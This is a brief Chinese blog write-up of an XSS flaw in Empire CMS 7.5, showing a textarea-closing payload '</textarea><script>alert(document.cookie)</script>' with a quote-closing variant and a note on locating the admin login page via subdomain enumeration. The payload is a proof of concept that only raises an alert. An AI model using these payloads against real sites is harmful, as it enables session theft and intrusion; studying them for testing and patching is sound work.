Empire(帝国)CMS 7.5 XSS注入

利用子域名挖掘工具,获取管理员登录页面:

登录管理员页面:

payload:

</textarea>

<script>alert(document.cookie)

</script>

思路分析:

这块只做了前方</textarea>标签闭合,没有过滤<script>标签和大小写,所以只要闭合了文本域标签,其它的payload内容也可以。

正常HTML的文本框:

<textarea ...>

【你的输入】

</textarea>

通过强行闭合文本域并做大小写变体标签:

<textarea ...>

</textarea><script>alert(document.cookie)</script>

</textarea>

也可以追加 '> 是为了兼容属性值闭合(如果你的输入被包裹在引号里,这部分可以把属性也闭合掉),

<textarea ...> </textarea>'> <script>alert(document.cookie)</script> </textarea>

相关推荐
无风听海1 小时前
OAuth 2.0 前端通道与后端通道深入剖析
前端·oauth
sakiko_1 小时前
UIKit学习笔记8-发送照片、拍摄照片并发送
前端·swift·uikit
_code_bear_1 小时前
OpenSpec CLI 与 OPSX 工作流说明
前端·后端·架构
xixixi777772 小时前
AI的“账号”与“钱包”:AWS与Circle同日出手,AI正从工具进化
人工智能·安全·ai·大模型·云计算·aws
parade岁月2 小时前
开源一个 Vue 3 Table:API 学 antdv、主题学 Nuxt UI
前端·vue.js
JiaWen技术圈2 小时前
Web 安全深入审计检查清单
前端·安全
江米小枣tonylua2 小时前
从红绿灯到方向盘:TDD 在 AI 时代的新角色
前端·设计模式·ai编程
祀爱2 小时前
Asp.net core+ Layui 项目中编辑按钮传递数据的方法
前端·c#·asp.net·layui
DanCheOo2 小时前
Prompt 工程化管理:从散落在代码里到版本化、可测试、可回滚
前端·ai编程